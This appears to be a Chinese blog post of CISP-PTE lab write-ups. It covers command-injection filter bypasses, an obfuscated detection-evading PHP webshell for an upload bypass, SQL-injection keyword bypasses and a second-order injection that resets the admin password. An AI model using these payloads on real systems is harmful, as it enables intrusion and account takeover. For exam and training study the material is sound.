记一些CISP-PTE题目解析

软件维
• 阅读 90

0x01 命令执行

记一些CISP-PTE题目解析
直接payload: 127.0.0.1 &
whoami,发现可以成功执行whoami命令

记一些CISP-PTE题目解析
然后ls ../ ,发现有个key.php文件

记一些CISP-PTE题目解析
尝试用cat命令查看
发现不行被拦截了。(其实题目过滤了常用的查看文件的命令

记一些CISP-PTE题目解析

这里有两种思路,第一种是根据题目意思用命令执行写webshell的方式去进行getshell,第二种方式则是使用linux的命令进行绕过。这里采用第二种方式使用c''at的方式进行绕过。
记一些CISP-PTE题目解析

0x02 基础题目之文件上传突破

可以发现部分上传代码,文件名被命名成一个随机数加上原本的文件名然后md5的值。

记一些CISP-PTE题目解析
直接上传一个带图片头的php木马(会检测是否是图片,所以需要一个GIF89A当图片头),而且过滤了一些敏感函数如eval等。这里直接上传一个免杀的木马即可。

<?php
function go()
{
$func1 = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) .
chr(116);
return $func1;
}
$func1 = go();
$array1 = array($_GET['cmd']);
array_map($func1, $func1 = $array1);
?>

记一些CISP-PTE题目解析
然后接下来就是爆破出shell的地址了,这里我们直接把上传的数据包重放1000次用来提高爆破成功的效率。

【----帮助网安学习,以下所有学习资料加vx:dctintin,备注“思否”获取!】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

用burp的null payload发送1000次

记一些CISP-PTE题目解析

然后设置上传的文件名1.php为前缀,加上随机数的1~99999,最后经过md5加密即可。

记一些CISP-PTE题目解析

设置前缀为1.php (上传的文件名)

记一些CISP-PTE题目解析

然后添加md5

记一些CISP-PTE题目解析

最后就是等待爆破成功。

记一些CISP-PTE题目解析

key在web根目录下的key.php文件

记一些CISP-PTE题目解析

0x03 基础题目之流量分析

下载数据包,使用wireshark发现是http协议居多,首先可以使用wireshark的导出文件查看一下http的访问文件分组。

可以发现攻击者在进行目录爆破。这里可以直接选择

记一些CISP-PTE题目解析

然后根据文件大小排序一下,发现其中有一个压缩包。

记一些CISP-PTE题目解析

但是压缩包设置了密码

记一些CISP-PTE题目解析

然后查找http数据中是否有包含压缩包名字的数据包,其中phpspy.php包含了这个压缩包的名称。

记一些CISP-PTE题目解析

追踪流结果发现Adm1n!是解压密码
(%21是url编码)

记一些CISP-PTE题目解析

0x04 代码审计

记一些CISP-PTE题目解析

考点就是让数字绕过is_numerice判断,这里直接使用数字后面跟一个字符串即可绕过。

记一些CISP-PTE题目解析

0x05 基础题目之SQL注入

首先发现题目有一个注册界面,注册账号之后进行登录。

记一些CISP-PTE题目解析

然后再发表文章处发现存在insert注入。

记一些CISP-PTE题目解析

记一些CISP-PTE题目解析

直接抓取数据包使用sqlmap即可

记一些CISP-PTE题目解析

0x06 基础题目之SQL注入

记一些CISP-PTE题目解析

没什么特别的,只是过滤了union关键字
这里用双写绕过就可以了, ununionion这样。

然后直接load_file读取文件即可获取key。
记一些CISP-PTE题目解析

0x07 无回显命令执行

很简单,看了一下代码,限制了cmd参数的命令长度而已。可以使用linux的流符号
生成一个文件

记一些CISP-PTE题目解析

记一些CISP-PTE题目解析

0x08 二阶SQL注入

二次注入是一种SQL注入攻击的形式,它涉及到用户输入的数据在第一次被存储到数据库中时被错误地处理,导致在后续的查询中,这些原本被转义的数据再次被使用,从而执行恶意命令。

第一步是插入恶意数据:

在第一次插入数据时,开发者可能使用了函数如addslashes过滤了,这时是没有问题的。

比如注册功能:

这里注册一个test'用户 ,由于'被成功转义成了'
所以这里是能够正常执行sql语句的。

记一些CISP-PTE题目解析

记一些CISP-PTE题目解析

然后登录test'用户也是没有问题的

记一些CISP-PTE题目解析

但是问题出现再第二次数据库操作中,由于被存入的数据库的用户名是test',那么在第二次系统从数据库中获取用户名的时候如果没有过滤那么就会造成二次注入。

比如更新密码:

记一些CISP-PTE题目解析

系统的语句可能会长这样:

update user set passwd = 'newpasswd' where uname = 'test'' #
test'是用户名。
那么这种情况就可能导致注入。

那么二次注入怎么利用,这里可以看到需要admin用户登录才能够得到key,那么我们能够用构造一条语重置admin密码就可以了

update user set passwd = 'newpasswd' where uname = 'aaa' or 1 --
a'

aaa' or 1 -- a是用户名

用新用户重置admin的密码

记一些CISP-PTE题目解析

再次登录admin

记一些CISP-PTE题目解析

更多网安技能的在线实操练习,请点击这里>>

点赞
收藏
评论区
推荐文章
blmius blmius
3年前
MySQL:[Err] 1292 - Incorrect datetime value: ‘0000-00-00 00:00:00‘ for column ‘CREATE_TIME‘ at row 1
文章目录问题用navicat导入数据时,报错:原因这是因为当前的MySQL不支持datetime为0的情况。解决修改sql\mode:sql\mode:SQLMode定义了MySQL应支持的SQL语法、数据校验等,这样可以更容易地在不同的环境中使用MySQL。全局s
Wesley13 Wesley13
3年前
MySQL部分从库上面因为大量的临时表tmp_table造成慢查询
背景描述Time:20190124T00:08:14.70572408:00User@Host:@Id:Schema:sentrymetaLast_errno:0Killed:0Query_time:0.315758Lock_
美凌格栋栋酱 美凌格栋栋酱
6个月前
Oracle 分组与拼接字符串同时使用
SELECTT.,ROWNUMIDFROM(SELECTT.EMPLID,T.NAME,T.BU,T.REALDEPART,T.FORMATDATE,SUM(T.S0)S0,MAX(UPDATETIME)CREATETIME,LISTAGG(TOCHAR(
皕杰报表之UUID
​在我们用皕杰报表工具设计填报报表时,如何在新增行里自动增加id呢?能新增整数排序id吗?目前可以在新增行里自动增加id,但只能用uuid函数增加UUID编码,不能新增整数排序id。uuid函数说明:获取一个UUID,可以在填报表中用来创建数据ID语法:uuid()或uuid(sep)参数说明:sep布尔值,生成的uuid中是否包含分隔符'',缺省为
Easter79 Easter79
3年前
sql注入
反引号是个比较特别的字符,下面记录下怎么利用0x00SQL注入反引号可利用在分隔符及注释作用,不过使用范围只于表名、数据库名、字段名、起别名这些场景,下面具体说下1)表名payload:select\from\users\whereuser\_id1limit0,1;!(https://o
Wesley13 Wesley13
3年前
FLV文件格式
1.        FLV文件对齐方式FLV文件以大端对齐方式存放多字节整型。如存放数字无符号16位的数字300(0x012C),那么在FLV文件中存放的顺序是:|0x01|0x2C|。如果是无符号32位数字300(0x0000012C),那么在FLV文件中的存放顺序是:|0x00|0x00|0x00|0x01|0x2C。2.  
Wesley13 Wesley13
3年前
mysql设置时区
mysql设置时区mysql\_query("SETtime\_zone'8:00'")ordie('时区设置失败,请联系管理员!');中国在东8区所以加8方法二:selectcount(user\_id)asdevice,CONVERT\_TZ(FROM\_UNIXTIME(reg\_time),'08:00','0
Wesley13 Wesley13
3年前
PHP创建多级树型结构
<!lang:php<?php$areaarray(array('id'1,'pid'0,'name''中国'),array('id'5,'pid'0,'name''美国'),array('id'2,'pid'1,'name''吉林'),array('id'4,'pid'2,'n
Wesley13 Wesley13
3年前
00:Java简单了解
浅谈Java之概述Java是SUN(StanfordUniversityNetwork),斯坦福大学网络公司)1995年推出的一门高级编程语言。Java是一种面向Internet的编程语言。随着Java技术在web方面的不断成熟,已经成为Web应用程序的首选开发语言。Java是简单易学,完全面向对象,安全可靠,与平台无关的编程语言。
Stella981 Stella981
3年前
Django中Admin中的一些参数配置
设置在列表中显示的字段,id为django模型默认的主键list_display('id','name','sex','profession','email','qq','phone','status','create_time')设置在列表可编辑字段list_editable
Python进阶者 Python进阶者
1年前
Excel中这日期老是出来00:00:00,怎么用Pandas把这个去除
大家好,我是皮皮。一、前言前几天在Python白银交流群【上海新年人】问了一个Pandas数据筛选的问题。问题如下:这日期老是出来00:00:00,怎么把这个去除。二、实现过程后来【论草莓如何成为冻干莓】给了一个思路和代码如下:pd.toexcel之前把这
软件维
软件维
Lv1
今朝有酒今朝醉,明日愁来明日愁。
文章
2
粉丝
0
获赞
0